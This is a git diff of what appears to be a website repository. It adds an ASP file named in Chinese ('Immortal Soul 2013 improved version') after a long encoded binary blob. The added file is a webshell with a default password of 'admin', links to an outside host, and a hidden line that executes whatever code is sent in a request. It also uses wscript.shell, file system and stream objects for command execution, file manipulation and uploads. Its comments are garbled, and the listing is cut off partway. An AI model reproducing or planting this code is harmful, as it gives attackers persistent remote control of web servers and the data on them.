zUjBokpm$>^ARoK%!|R715(V1JqoE);^G<;M1$Y_O49_sZQwAyd-E+tP`P3h%mfwbq
zeFd7T8>d!5Gd1wrhSk=wfB*g}d>xQ?&JWs!J<vUm^$gcl=G@_@;fEQ?>G!U``|i0l
zM&cE~9@2=3jSVH6z`IR$HH+97bB|#x&0uUF+`m*=p64i>HWMNRnrm)&08)Pq=<WG#
z`>e1qITBgci@D-C6oi9w>&W<Xfy1xaebweL>FvJ8I>f)V-aB>TMO`*We)0DA5n<cM
z^=MD1wuGjl8q|eCKtB9n%|&yGxtVHtcQvEF`)YI1;l$iXIg8k;C0HiY91e#g`Yx``
z!L^{X145OWS3rupv&h!GA9??e1^*9pp@?H=JIAL+rgx_1()lI8gM_}#J!pjAvIsw$
z=a;X|j6O3AkMi)4#Gm7(d>s=T!V>U}HL&Ad`@_*|vg0|g|KY;<BfmI*jAU^2#alm)
zUjG+ZHeBS-cP<@xC3@iSso$P|>A*pr+&MLv3C@){5+-58qrMtt&&9o_;Yb;g!;kMw
zna<bhk`~>LV}znT%E9T^ntb1ts#l}1R>iqq$~psZzGcI_KGJEFm0b{Upf#JO^y0#b
zZrw7m@fsbwu9}+#AtiKjzMmMEQ|8HgS3c+21F^$#uIDwtt4#|;-M{FNH#A_X-2U{!
z?blv!RRJe#91--?AE@%`ky{@#LVR-{DY&K8_?`YP?*HiOKV3NQl^^B}!2?Vj6Q^*C
z=#KaFZ`t(pW>|On06f>GFO4fKzUutNPyL<*lOSv+#*8A9WfF+{4FVwMy(tI&JXmJI
zuyy*in2#J#&Z`s%;_RK?d2shtf!VY-N$yuOHsu706$9xAfYT$M5{D&4bnQ}i6Yy@1
zUKZVMI4naUK5Y8XL-Gh6Ieq@xi3<q{oh$CKUHYeMzi2&CXZ&`zrRGL05rnS%>f8^B
z`XfKPeix&{P*_WmY1{-3RjZlRNJwwGHH4GJw^Cg{^=~g?-0QckTlkru*I!F{{lpEq
zX3D_rAJXVVJsL`var44wYkr7~0PDnW%b22}g*qD$E{D%Le*$z)DFfR{{PG<dzdSe`
z6vE=<qSYZ9%T{F)N^2mwU>ycGH>;Ok6YKO!y#{JezHsYaD=Og~(U5b?F7$RyiGdOm
z;KVGd=kYbVyYn`ukn`yd;`KL`UJkx|{2y-~d*?PG0<Cx*G%_)l7?}a&_$jwl*H3)W
zNT0ku6TDXOjvVqBFz{rBAcnhJ=B~*1;z&8+)?v~Y#IzFx2#8W*Xs#(yOnP9x;gZ|T
zw_64IU$BCRY3<OrPefB$%FI$I<PG{Eq!VAz{s5obG3W)YwjwhvVu|Ss-1;2@8X7QL
ziGu3kM&R=(k}>;Cod7%gf(!_mvPXD_7DEcc_8Y@@eZl2{sU{u>=!hXSD4%eDfUTzm
zU8g7)`ht>d3s7Csl00v)Ub-^ChVHmf8apKCGuTG%k<-UMy!-y?PjCMC#08!^zC?l$
zXQ^C5E;e)!Y|VH!x&OkQpB;Sd$mu&To%qSIn>Sv#eev+QJ4Y{lc<|+uzrOqF-S_XE
zzI{xGdHSapetYZUvEN)c|AUuLf6lZog*xc40ZvWWL-Shsf?XD&kfARuffCM$x)6fm
zzQ)ODy#g!+bF)**01@LWjs?Q%8IO&J9SG`}1_ND4QasQef}&a3>#aRqy5$TgDCt!T
zkfskd(kE<pmny=ru&tEJ`+077w!B=m-yv&+w@3Rcm50NYoc$Gw)lpYD{V0yFh+rj~
zw}%lQ`@{=};oJBIN6-08m9kYq7y$8Tsg<DB(LFZG&ahnsz07!ZePfHJ#T_;l{yH67
z5QK`)U%P!wPsfmJlShm2*cM6RIH>TVaAQ%z<@4y{j;9$Wvfpu9nm07=Rtd_Q)h+R$
z!$Zb@KL{XSu=`O9;&nNao2MQS8cuNy+oP^xP?MP_?ZT6hFIXqm>K%sC@fx{4!qT8p
zV0oHoB<qO7S-WiJ4LbqD+dwj?36Yl0e9&cKL820vdc2ajCuTihK;!}zX*?4&IQyQ>
z)8ztU3kg1A6<iidrbCFB;rM%?+qyJRxBl1=+PBsc#9%W6#`V&jx6l2T>sNTN&`s>Z
zjW4;Lr)(Kv>%LoR;Hl>1@zd|&sb)Cnb7yxsf)FI|xdW*V9u{0*RwhJ^IO!)|tuJ^<
zFr#<V@>o%JZWG4SRg!Y|&2U4*&v<;3e%ZR!CiI&xJtij}@3mQ*^-G_d;1)5JY%81N
zrlf7P$F>?bZN$AVrnOC5v`#;s1PGe_jK@u5u*21yt)@i0*UhnCdfjoER{KqV7BXLJ
z1~#uBI~v<aQ;yr11;Ap@#nI+I1<}PTF|oX?ZyjcUUSZ@_Dw=12*=)eJ^V0-^Hx7%@
z_VZ*LLzo<$Y|7$Oi-i=PkwPY-tx<J?f|u3f5WNv9+A>_CD)~?Yz^~;46_qxnpri!5
za@6+e)WI8MP>soy2q>uF1$joQWz-`E)RUpaq$TAg+Z5olwT40ygAY`Z+y~Tormj|V
z>@TQUsd};a<ZkNF8enzPLXCk4X)!|708QaeJnt{j5g#*RHE2tCexSqmjyq@m<eazw
zSAU3HzK>iE&UgJ0;@yUNwwU;=wyXg|^f??8PTnou?LbX*5byX<L-0XErT7XATBvUd
z9hc*mPriQsCDG6f<5kvE|AUg>-;MTeAKkQRcw|d|U%abtY;34&xMzER*Ve70Te{#j
zc+=+op)G&=2wGCq7P4bexIC-{;2hb}7EY)s{)d2*XgvLICx0*)238YWxAgVR!RU2j
zPLN8kyQ@&5oi7)knWOScxjK`pW^$!WJvFx~*6qmM55d=%UvEi6jzc*-vzYRH4m7GS
z1sun$hfY{2!Tx4B2WK3q!7vF3DRWTk**ygH50l|Dsb53IeZ8*wF5Y<c&y@lcLhFNJ
z>d(QMM1zi2gExh?BWqTtTd(up2kso=9j||@5%%C6#~--kmOdmNykjnChO^&EQ->LG
zSj_b-zOhpeZP}m-eb5@R+=<)+t5jK=f05DzvZ3!svZ>g3&s=OW-hgq!V>1HU$l&{j
zr=DvBfoZfo!bcH1muDrgv60d1gxjpOIhuRKMoA=nEnsCDVV#(ro^!ou>=>qxkoAU7
zINc^)I3J-w!YGFJvn~<)nWCy^!{tfuzBv{fnzf5{<9PKo@9FjWRD2(`kHa5dxGj3<
zMBiFUv>wM%Rn!14Umy2Sl7tbX+T0I@{l6a70oi)|_1^I_e>#5o*ys1}-u?C42L|C9
zy@5g4!_PKJms5`xK`0(M&iPM6`Q4?=;&2JkcICL@o&uafL?NRq;&Rq84#3^>jRu(3
zvkz3;slIGs$meo}#pWXv&#aXJs;d+F!yg~{>HQbboPpFIRhkDi14L)!nNew6^l+c}
zVq$b9KfIjINA$3ad$Re4IH__?t>*t`8S<?NW&adt;daT`Od3J342|Dv6+(U}q~Zk?
zI@uJh;c`1vfp9pRVJt9ch&Hy+iO6Bv0I&AA*?sey4|DfUpd+_&$X(z)7EXz6(`$p!
z5z^B1g$&@;|8F&)E8r;>fm7)v`KxBc@D}Ly;vzwuD7zJL`P7JH6lsi%Pde2i{2WK+
zFT$GXXL5arazL+JTx)ggo6jN+sHkAz6&x@1^?IcXC@t(mY&V1j0}zXt5D4X9mQ@F^
z>vfYZ;2DUzXc#*5I=r|44Gg+N(VUD^f#J#r=ij~h?!9wX8N>01*n%z-B5JKd!L+=8
z@XkxOK01py--i#L{`-S3-#dKv9V%^7%6sP6`D>K6G2W7R@dZ#gPC9wY5=n2E3Q81f
z^4PH6(3C(C*OVv&CQSn{jw~QVuePSr7a_VBlgx{g&Giu`B4tr3N%E8!cdkooQx-v0
z8F0_en1nn8NkVP~Z!PuMP#wap=>-Ub^UyX>dY3s(GM8`AR4{;ShN24+4#}Bx(+huL
z{4{k~+PK9gER-%00Czm-2;+mC1@2<{KyB+TKhQoNn0-ryBCMs=1vHvx5KSF%P{3+?
zvm?%n;POE$y0y)SZKtvQ)j}N?35<EYDIPBCB3Zv2nE|BP5s*53rkgp#ca7~8pwGjn
zPyOlC<%2KZdHeLeQ^)+&xbA8aHlkv-C%*XbKpl9Kg0uA(uj$T56P9{(M*hd-leH;t
zUvKik?gtN_rsLyBnt4OZ?%ubo@7x>XSORHO9>btiF_`SPAx?8p+0N7uDXx%Jj;KHQ
z09|(ap-f;hljgJIA^MAGT_8+|&pwT9jEYUa9{bv}fwhY@Y1az29`gbypGL&Y9pdcg
zN8dd0()I5heEG^pzU_(L?4fGET4WGqDtdM0@Dx>*Lq=k`1i1nk$TsdIUHkKe-HY`E
z1Qa=FP2GF%_C+d4QDe|{z)i>Wi7m%2qSiY)78OihYUAapNa*Wd|2mIA)C-%*)ZlnV
zLMfAV>oF&W-D@clsvs|LRBBTqxr~Nbm{D3=HIWSEGJ7*tRf=FpZ~y^ADiexUXBc@D
zRi*$`o1qTm3i}KW!(xt-*woWgS=lyUt^$9FcxA<@m5cCh_#|u_wi(lqL~k#Oz*=y3
zp_IV&9zP^7W*PZPI(C-)5lVv|^}~ZFk2|N|Q=Lr!A$xtR8BmDvC{sWb#>Wn|1(b)V
zM0Yp*Kx5wlra)P6>$W>zPwtwBvD#jT7A#bXLd3sfo}mVY1_u~lKx_nzmZA-@;6_zY
z&41tH2j^x#P^&75{N>c3p_PQ)NFb(w7_|iS`Ho+?cvgB0b<m%BmE=q?1a&^b1z8ms
zk28`QkEX_lL77HFWsg%EUyrW+B691++JwHdB69l)8!7QirY-;}9c=XS5VQZo9i+p7
za}~Nd5Xm}Bg7H}arlEIPkGK+c)8^rKUwzNkg)Q2;mDQjeam-Oa)(L4es01FUBd8h`
z2~Gh4)$%#|c7b=~6g<b$bXIC@-PHT^=KiPq<Go!t=cwtL`hY1ref?XWj`z06b8A~C
zMl{na;R+`q)A$YceQ2(}T+S~Q(gZ;vifJC4r6sK(VOwv0Z>EUg<><V&15VU@n1byb
ze_K2W>XP|vb-A2!D0<o!k8K|rotTCzEZCoe5FmAhG{Zn6Zv$@MSrnZf8M2md)3`X~
ztHWyfmIAB-KMsuQg`xR<pwrG@)PfT!WwI$;8dHZpao<zM#+{KVHK@mB6rK<<#UN8m
z1bnzr+6xE=@r0oEzn$?aOLX<hN2FdV(0O$hS6-=h=o3i?a9Y4Rh_Do>M(6t1rrA$J
zNjjm}AaP$P03x6e?>ChtAI+^_V=9MJC?AB>O#!}wk`a&3qg#ccb5C?-Wd+&HO;rkt
zAjrLk4}BtSz^{bX#E=5k?aYm2anpngURW(dZ0>ZLKD<;h_jXqH=JPdJfOVR2l=2f!
z)O@Ec=PcT0bC`W6j&fSwEwO;&C?N2gB>?Y7rj+y`p;6r?b-5(9fPDxveLL-kYizL%
zTn%F&`mJxmG&BK|&<KPm0T5%>x<K@u%Zm}9Px|iaG`}#=sKlUcEMbf13X|gNFs{YG
zIBd?o{H(NPf3qZpgt>CNZB;rREN^DjBH=$0-C?>EWwIpyd#1SNaXuWWnJpv9Eu)d3
z)Ug5x&=P4~h;(_;kc+V8C@NM8V5f}PW=*ff%$eL2IgCyK_RVtK_u7_R(nnl!McGdg
z@Gx=e!^1CL`uVjN2kEGpY{oJ|Wtcwq0`y#l9x(4T#rDG@qre_bQ6IeGR*Z{3zSlwz
zz=|`&tQltHMMTb|R1q1KRm3#bbQ-CfhgbU~62{RbTXWn7mgGIx4S=jK!L}9mS93dj
zycO?9<`Eg&1>Y0-q=Ws!ZN3Nb+r%|$c%{4@YcB2ew1S{Y23lem-<x_#uu1Xa7U;`s
z6upX@4!6HbL9ww`Z!F{M3p<01!AZa=2auD35Z1*O#KYBkGDlYn@DUy}59M*rN;oOM
zQV<J6yevC)#tBnQ3lPeS(7|)Url9o3I&Q<5&jSbVe|F@D;z{-Py<?Z(pO_eZHg)&?
zD<2&=c=nwOFViE|<sY5DHZy+Y{98YJ^^a$NN|L(!>A{!Z`uy_y*RQ<#$E*JeNJ$x;
z2M%66dH>9j(=5T<6L&`@hY!AtKMWCZ=67$sarMTj-$gI}`RuL3S5I8M@k4Q^cj|X1
ze!?1TDe}f={K~ftJACWb3G~^tQj+vQ0<{WpuH%dEE$OZ<0^JNWRaNIY1?-aC<XWz-
zq@^UUk1d<F_Vpv~?$%BCvt?7Xw{P>NXq<nxZr#!!<r7<Ua}WOX_4UW2eVd|vz0tUM
z*fK;Zi_UmpYu&2=20i=DPe1)Mcz`+miN}GIIcNdk2q~OYLV5e4PjJ<2FL0-+jn5!g
zZyAX!tZJOlWTsG>%$Jr!3HyzjYhsEUVq~_NGM?Mf`Y-~`Ic|ba_Rf5&jfv@o)?<{h
zKs`61Wxc2?1!p;$2uoWEAFfX6e08Z%$`r>-3*}IvAtBOf1~LO52}8MDx;&Yi4<-D+
z+#<BOo<UfdP{Mvg7B%?NxcWMilOy;kk%A~c;B{NCSMm)vHrilUV1sQ<xuFpU!>Kw#
zE$59%b||!E)0ZJLSL4~R-ZG(n1}h*<viHt31hcth4VP7Zt_)75Qs0<xhRaJ}J-9Ec
z;JcoK&RQLyxYd0vN&_fh8ZcF1v_=C)4Jap<KhJOt<I_uG-zH<t916kDRJnv$oPgP0
z98H6iL-3xuR*O4KJGD$hWqUnctMZKV+|b01(Nr?t+t<Hovu(i#df?s)>drzEO^jHy
zbPMW{!U;l@C5g+#`3oh+VNyZSd{FQK41luanMu@z6BTofriV_Ho()J^W>7YP*=dor
zgISbOXL4l-+DggV=<L4HYAjnF9ZKin?O=2`9SIHLrnEiAd_4Vt!a|)1Q(mP04qv_y
zu{2*zV)CaaMo~Dv&7uzPEf%_t&^FG7Gd_aELN0+@`8SsH)m1Qu5Q42_ouv#y8&zYu
z`EqQfvMW28t38{aC^})PUbnyiQbXa8z>i0%S-h|n`5s|mGnl4_3hAbk*qoY9qbXB3
zHab0~2plOpI~O6|Z_X!_ZqwfP4o6fb`=|=;wuhi;2;^!TXG}6$86+mk<w{~yq@Yc}
z8Xew1FSGdy;wRBjis?BD`Fu2_0udnJO~+tclpSE%Vtw2CB?nn@_XbLuv05>#e=r8y
z0L2akSGfTF3AJ*rRDe%sAc{~?U$tz@aKE8qekB7oP3f+D$MaS+4gA?3xY?W6(q#+~
zIZ4Th*nE&WURT))YGMhA{L!Ca-zsAuMYt5&mx1*mIA1LiqRea8A|tj!;0qXB7V2k>
z;Vp>G>3Wa}!zy+eKSes2L@?ce2aj-Ee_IbS%x`9?;EOp&qjx65y==m`_Xzhj7H{Zx
z@Z?`^{`!s2?*HP<U)0%$%Tii%T7M_%YX|+IL+cMG{N$MY53)#U_!8W3ut~tzTm%->
zZS&j*VT0u7JS3+^XP+CL-8D5dIZ8D9*kHTu30i9+i-es!qK_7G%du>Esk>0AZDFui
zp1+q6ZM9HgeFPj;DP>s2l>R*{u<1M~D#mBl817oA@b6(^Zekw5h~i3FXE?se4Z0fY
zu)I4Z)agUq#Psmc#IB){ky+vm%A1t)hmBksB4-TMx95a)({UT7CHS!$I;}T;fA{_4
z@2%T{iC=5*n-SLUw%1E#beG(8=W4URKPalNA3pOh4~cB>$nt)^V0xfEo|P~>v*Y@o
zFPwj9u-eY*)Q-vRSPs);yJlvmheuPX>Dg4nx_CSzIP$~$pV6nr;~&EG;|6%==yoO4
zS3W#^?(xHGI8bVOEWLARwt)+Q?T^tW7te^W(2Q@9T>vpNLyt_{p^oYKbfgf4Rf6Gq
zE!nCq277=tikWSsm|v*lAx0a9xqy$IVjw(x(6EK^%||_ZGHV3l;0E$+Iz7WHMg&hh
zG>dGduY_do#^l2I%F`mhCY3?qsF=^xc~lg~Sd)cp6_Lmm>alN5PO$M1TYVPgV~h#z
zgq|5qhoa~#x&U`_^yejcH9RlEYnP~INCFzot%?t|fx&+Bgy;iTG)eL+aA)KW#y;hs
z5r4t?RS5BWx2Mvx5!0}$GHoyCR@tFD9O&VzTL&B;Xna>%UYf@R#=aIYN$l~gK8mkn
z9$|Pcc6^=f8yELuM4X&=;Hjd7?)bY9kEZeVM->z5YD76r_6H&2@kol}SR6uv&?DbZ
z;v~t5d}({cwC-;P`9rnrcDPN;Nq!XF#9;<5=Hr2a15U@YaIu%hyKF;uUe_JYFwAcJ
z)!5RgPFVop=5C*|9ed3seMr!zhbKzA8`}R0;KJi6e7A|?27fOyjskIjKXCL$Sa6=k
zd0wd;A0F;e%Ild<x*W$x{j6sv%*qEy%F8_P?a*D$J7d}uzRH6z#3rp!18qQcKO3>R
zoqEW`i<PR$ftsKABHyh6ivRi+3E|9&mUtm*%7Q-tX5m`joW;97bF)iyvlnbKD>(~#
zy>k!83z7<u7wj1rN)pN46$m&e7tu%Lg(MkBWFbm#NdQ`utl*iz0I_)!-oBssBBXNp
z@^U@d_rw>AWxQ~kfraEQ$E%qnbU6FwhpQ9N(vm`Eh#_7B9Tt)VuMi}FaOnq`4aO7d
z!mHhAdURxZa%g;tg|#W(8M?-2l07l`FPPy_05VlhGSz}?D?ahXB_c7D8c&ZpY%@JN
zH8eFm>a{>kj{QCWQlsgXy^jctNrdUk)s{=o8%UlHb{cxVEB<`^`5v!%fjs>`O^=p%
zwMaJPILP^WepNuXNCP+)uU!CU2R12w%rvyw4jWx-U_*f6WMLQ$&2e`4{GKf50y(>M
z*>LHEx}GgB<wxKYHJg~53zQ0VO^_a7LQdT=-*BYIkwUH2;Jaq?MT*&K$#|f#K$lbb
zd=6&R@b1%yyRK&;Xu!W*zSNX8RNS9gtwCq7yk7uoDgZ89+6~)KGw9&71OWKPGNRbE
zp1m%(oFq1D(#K4`iaF^DjwRFuzjyiEL;(-CJ1R|Jc$p*R{f)y2fPt>2s?u3=7vu0`
zn#R(c#?ssjZze#xZ`l~5Ra>A5z|j>r4Q|HnER}@-a&SBWn52jR9xN2<lAIdUA|Y;V
z8nj?^co{JYp@Z89tz=@bg{9@ChRi_U6zxKZ7g6c*N%b+*Fl;-w6uu^B^SfbUS8XVw
zP{NH<DId&nhO${`4+)(=Kf4nb)QRB{-vWH%i_j?+zVeM7<7uz1@DeUwY#S=LF^f40
zr&^&X)og1jwH8UR-88_>DY%Be1rfm6^OS0pTFdGd=P4+*`Oi|0h%KP11Jw-SlX3A$
zBrF{Kv)iz)?qvueAbswx#o_M+O1V)SF8Ghl@%ZHk+vYGpNb=oqY_QS}$79zWcwn@g
zQ@)!j#ElNcRl&+YzceE%)c&h|n4)KU2{zC{TT0651y(Qg5UYsbH*D{r5MhRqs1D1Z
zTEvbeJUuUa&GjJ}Xs(Y$w?4<WR(<R*Et`;ZuNC}Uqm^u{CXndX$Ci%jMiQ{8rxhj^
zTD5^hw~dAMTCg<Nsv$4Wv?o`4&X_@}n#waO&F*Df6_P$3HUn+WxQA0M<w)47rM>&-
zyYF9k`RqH6k2X6<nH{0%^;h4y^v<Qz-@Ek31eA|;F7b+X;aBkKBogC}5OkhwOX1FK
zGQ(IZWNA2#M8a;bc+rU&LW-%_gMN*p{djva)%^DUvg)7(&Q&-60IP0(1FOzEh_qOE
zy;yI-l{c>|Pft>fo3kvxhJ86iZ9GS0<>Ws+4*Ix$izPUZB{=^-mS8g@_>a8=`zT#|
zY)kOXpI-a3I6A!Y(ebOt{)}Z6U1ME^LTfK9Y#VE>EZh>fva%1bvL0<e>uXw854xeX
zSU29*WnMbp{OQ#f-}>d@ThTjj-#d2u_Jtdl{zO(Kn%PvS_WOVD5T5Qcl8}cF-v%e-
z81VZMcIf%z%$v7Acfzj!k5CA9aH75a|CV-jF>zE;cou6l7~1HY8g(2n%S%~k*S1VU
zTR^A*LYi)oM_pLx78cm-LV)<7ulnFa(--3tHkvm6_J;+bKxJ2(f+Se%wrOItSX+P6
z*u=yjLF0Gs-`v?hwT0ZBnR{oxIrnewx#ygFZbcaDm}<Pr>nF`uy?daw<-?w4?#jMy
ze0G;hmLr)BeT<f$LKTOPhO9&thgl|Z3Ruw|!!REpl_6$WLgj<mx1Q3Wr*!HmoqCF9
zbp2oX1D7JkU+woQy-C$hC`+UoCWqRE9Qng%dMEsrLf|fM<!fBLr90W59DB0_t~Amf
zJ<?y}<vyy_eIZ9xgF!QZTG`fS%H9TPkQoT}G5MvaCg{NV+5dQh(9=LL;@vC8OAQht
zL~+B8UDZkhkikH4t%I9=YC+42)DlMs_lvRM;6O|W^zWV2y>r)1)+Zc(j1&YqPp5b?
zha`t1D~;?g3-*>)M0)pB?mu|{<Rli&x$C64SL|UHIgFL#gM&s9ixtd}e@FH6yYHVC
zlDyAP%qDblOz73z#iJNKhnPHUo{J<>cZik+OlhJa)m^z8FMD}%V{FV_W7#w*2G*g;
z89Rvq@sXYPAQu9$DMlICJ+g!_eZdg%CzMJbvdEFxz)%$Gd9BgGp)g&Rv3qqc*r~O9
z&7G@n=2VUGZW3UA@fA1y)s2~HFMRK2ey+Wc?!mxLXv6qJ+tpL)Yw4u?Ea(m1VXm`T
zkPMAlRaPrQ8IS};vI3clLHMK+Vm&E-J|Lxgxxf4*!iH~caw$h6ba(C%y71N(F5$S4
zjYHs0FRr24F2snsRNj#)@>{xd?+L&Yv7L6jtDH$BSp=k#VjSw0POLbd%rKupTV!8g
z<A>y$1Yyz2(L)UfESMC))=ONeRPq&8MFJ~WPoWrU>*{M-yN1n{x<(u46)HK8Ycl5{
zsW4#gB!LJAm1kySD-_c<;X(YYUXS&``Cl#)%h{u_;ga;ZUPZ=h`5|O#VGLR_lOIE-
z7RDg^mi!npwJ-){m^o?7T^TC5Fbbo$0F0Af7>ChZ0LMu$jDz-6C|4@EFiKmLmo7i5
z26Q-pF5DTmY;mFzqOb}a9S&pTTEAs$7wU%kzED*l3`WSZ)u~E^G!wIGss^@zj?BGi
zxqKY!u=`Na<yLQRFAQ#Axx;lFhalyHtrJ`U9BL8$t{yHi(fw?GRLIO2$KnP&Dl$Gq
z9*}KzP?1B?$Urb;+5D)Y;W!Cngk|%iiq^82JHOn4AuKHi$OkGtSI<mErH=wzoH&SZ
z@@&J?vx*3zR})Eb%T}i<F&OO$b)hWzQAJ}+9KojtzbXo5Du|+A6~%>GY+E<W)-Kcy
zYG0j3NMbD0hErQ@&mvLcD$aESK6%1KiaA&&&YgXu<kk_E$>4Ysb#4|-7I%w%ZJ4@`
zM6N^v5k|T*Zh*@d(KD?l%n*t59TJvS+V>6&zOMs%Rxml;*iWF#jK{Dq9yjLM)iVl>
zM@479FX+RxA|4fdY^CJrvA>p&KZcX=U|$3qNtF~ohYJqL<4TJE?YgA+V6&&lFp3TO
zyZPQ5FVOLmzj(0dg8iA|=n(eBiPK*uS1+BWso&+l&s;nA`}`fERLA>K;Jw-8F(^DO
zPz;0ce#2WFyy?4B8?6oPW_wo$>xG$Ew*}U*w>$=gCtO(LFBWN76DQ{uXHG4An2RQv
z$F>c_pzxFn=e4U3XgEusFV0T>F#RX8l?zH{?^KClP$+XjZT)7G29-))nOz=BuP>yx
z&3-g~vo;=G9?LE;Nu2)`k3qrfLR`P0BQ9TDT3!A*wK}~{RdDs>N-__bw?xVP`g)N;
z!JXrH-DZu<&(@b#saDa=S&nhkEA%G;b^H&HLBUPm+sTJDsJ8xQm>cz*li!_BymT}=
zapBVJ!j*}yKfRS%vrW^78z`U0*LZl+mFd`2u?C7Pj!^l@>KM_f8+e~L-|#VyLBZX8
z_nm!21H$TsyXlXof7xDH<)2K=tdTKICSkJ44M#l&g=buZ-EJt+@Xmd(IG$b}Po4QT
z_5J)EKXeTsRVS`l<kB~47!=%K?<BTpU=tV5o}m6Uo@x>;ug480TV9Q~$e{4Ji?W9*
zw`yPos&ls}u#J$%pzy2<=GFE`HJHn5Q!6v?CRV8AU#3!%75U(1dTI;)_iZwa#QDc?
F^$+6#njioG

literal 0
HcmV?d00001

diff --git a/www-7jyewu-cn/不灭之魂2013改进版本.asp b/www-7jyewu-cn/不灭之魂2013改进版本.asp
new file mode 100644
index 0000000..c8c175d
--- /dev/null
+++ b/www-7jyewu-cn/不灭之魂2013改进版本.asp
@@ -0,0 +1,1373 @@
+<object runat=server id=oScriptlhn scope=page classid="clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8"></object>
+<object runat=server id=oScriptlhn scope=page classid="clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"></object>
+<%@ LANGUAGE = VBScript.Encode %><%
+Server.ScriptTimeout=999999999
+UserPass="admin"  '����
+mNametitle ="����֮��2013�Ľ��汾"  ' ����
+Copyright="    "  '��Ȩ
+SItEuRl="http://www.mumasec.tk/" '�����վ
+bg ="http://www.mumasec.tk/"  '����ͼƬ,��ʹ������
+ysjb=true  '�Ƿ����϶�Ч��,trueΪ��,falseΪ��
+htp="http://www.mumasec.tk/"  '���ܵ�ַ�����ɸ��ģ������´󲿷��������߷���������
+durl="http://www.mumasec.tk/"  'Ĭ�������ļ���ַ
+'---------------------------------------------------------------------------------------
+'����֮��
+'2013�Ľ�����
+'���������κκ��ţ����иĶ�����ʹ��,���κ����ʣ������������ϵEMAIL��xieedaka@163.com
+'----------------------------------------------------------------------------------------
+Response.Buffer =true
+BodyColor="#006000"
+FontColor="#006000"
+LinkColor="#006000"
+On Error Resume Next 
+strBAD="If Request(""#"")<>"""" Then Session(""#"")=Request(""#"")"&VbNewLine
+strBAD=strBAD&"If Session(""#"")<>"""" Then Execute(Session(""#""))"
+Const DEfd=""
+sub ShowErr()
+ If Err Then
+j"<br><a href='javascript:history.back()'><br> " & Err.Description & "</a><br>"
+Err.Clear:Response.Flush
+  End If
+end sub
+Sub j(str)
+response.write(str)
+End Sub
+sub RaPath(s)
+RaPath=ExecuteGlobal(s)
+End sub
+Function RePath(S)
+RePath=Replace(S,"\","\\")
+End Function
+Function RRePath(S)
+RRePath=Replace(S,"\\","\")
+End Function
+URL=Request.ServerVariables("URL")
+ScriptPath=Server.MapPath(Request.ServerVariables("SCRIPT_NAME"))
+ServerIP=Request.ServerVariables("LOCAL_ADDR")
+Action=Request("Action")
+RootPath=Server.MapPath(".")
+WWWRoot=Server.MapPath("/")
+CONST_FSO="Script"&"ing.Fil"&"eSyst"&"emObject"
+FolderPath=Request("FolderPath")
+u=request.servervariables("http_host")&url
+domain=Request.ServerVariables("http_host")
+FName=Request("FName")
+cdx="<tr><td id=d width=95 onMouseOver=""this.style.backgroundColor='#696969'"" onMouseOut=""this.style.backgroundColor='#191919'"">":cxd="<font face='wingdings'>8</font>":ef="</a></td></tr>"
+set fso=server.CreateObject(CONST_FSO)
+set fsoX=server.CreateObject(CONST_FSO)
+str1="http://"&Request.ServerVariables("SERVER_Name")& left(Request.ServerVariables("URL"),InstrRev(Request.ServerVariables("URL"),"/")):BackUrl="<br><br><center><a href='javascript:history.back()'>����</a></center>"
+j "<html><meta http-equiv=""Content-Type"" content=""text/html; charset=gb2312""><title>"&mNametitle&" - "&ServerIP&" </title><style type=""text/css"">span.underline{text-decoration:underline;}span.orange{color:#B3D169;}span.project_type{text-align:right}span.grey{color:#666;}#links{list-style-type:none;padding:20px 0 0 0;padding-left:20px;}#linklist2  td{color:#fff;background:#191919;}#linklist2 td:visited{color:#999;}#linklist2 td:hover{background:#B3D169;color:#191919;}body,tr,td{margin-top: 5px;background-color: #000000;color: #006000;font-size: 12px;SCROLLBAR-FACE-COLOR: #232323;scrollbar-arrow-color: #383839;scrollbar-highlight-color: #383839;scrollbar-3dlight-color: #dddddd;scrollbar-shadow-color: #232323}.sb{cursor: hand}input,select,textarea{border-top-width: 1px;font-weight: bold;border-left-width: 1px;font-size: 11px;border-left-color: #dddddd;background: #000000;border-bottom-width: 1px;border-bottom-color: #dddddd;color: #dddddd;border-top-color: #dddddd;font-family: verdana;border-right-width: 1px;border-right-color: #dddddd;}#d{background: #121212;padding-left: 5px;padding-right: 5px;font-color: #fff}pre{font-size: 11px;font-family: verdana;color: #dddddd;}hr{color: #dddddd;background-color: #dddddd;height: 5px;}#x{font-family: verdana;font-size: 13px}a{color: #ffffff;text-decoration: none;}.am{color: #006000;font-size: 11px;}</style>"
+j"<script>function killErrors(){return true;}window.onerror=killErrors;function yesok(){if (confirm(""ȷ��Ҫִ�д˲�����""))return true;else return false;}function runClock(){theTime = window.setTimeout(""runClock()"", 100);var today = new Date();var display= today.toLocaleString();window.status=""��"&Copyright&"  --""+display;}runClock();function ShowFolder(Folder){top.addrform.FolderPath.value = Folder;top.addrform.submit();}function FullForm(FName,FAction){top.hideform.FName.value = FName;if(FAction==""CopyFile""){DName = prompt(""�����븴�Ƶ�Ŀ���ļ�ȫ����"",FName);top.hideform.FName.value += ""||||""+DName;}else if(FAction==""MoveFile""){DName = prompt(""�������ƶ���Ŀ���ļ�ȫ����"",FName);top.hideform.FName.value += ""||||""+DName;}else if(FAction==""CopyFolder""){DName = prompt(""�������ƶ���Ŀ���ļ���ȫ����"",FName);top.hideform.FName.value += ""||||""+DName;}else if(FAction==""MoveFolder""){DName = prompt(""�������ƶ���Ŀ���ļ���ȫ����"",FName);top.hideform.FName.value += ""||||""+DName;}else if(FAction==""NewFolder""){DName = prompt(""������Ҫ�½����ļ���ȫ����"",FName);top.hideform.FName.value = DName;}else{DName = ""Other"";}if(DName!=null){top.hideform.Action.value = FAction;top.hideform.submit();}else{top.hideform.FName.value = """";}}</script>"
+j"<body" :If Action="" then j " scroll=no":j ">"
+Dim ObT(18,2):Fn=Action:ObT(0,0) = "Scripting.FileSystemObject":ObT(0,2) = "�� �� �� �� �� ��":ObT(1,0) = "wscript.shell":ObT(1,2) = "������ִ�����,��ʾ'<font color=red>��</font>'ʱ��<a href='?Action=cmdx' target='FileFrame'> <font color=red> ִ��Cmd��</font></a> �˹���ִ��":ObT(2,0) = "ADOX.Catalog":ObT(2,2) = "ACCESS �� �� �� ��":ObT(3,0) = "JRO.JetEngine":ObT(3,2) = "ACCESS ѹ �� �� ��":ObT(4,0) = "Scripting.Dictionary":ObT(4,2) = "������ �� �� ���� ���":ObT(5,0) = "Adodb.connection":ObT(5,2) = "���ݿ� ���� ���":ObT(6,0) = "Adodb.Stream":ObT(6,2) = "������ �ϴ� ���":ObT(7,0) = "SoftArtisans.FileUp":ObT(7,2) = 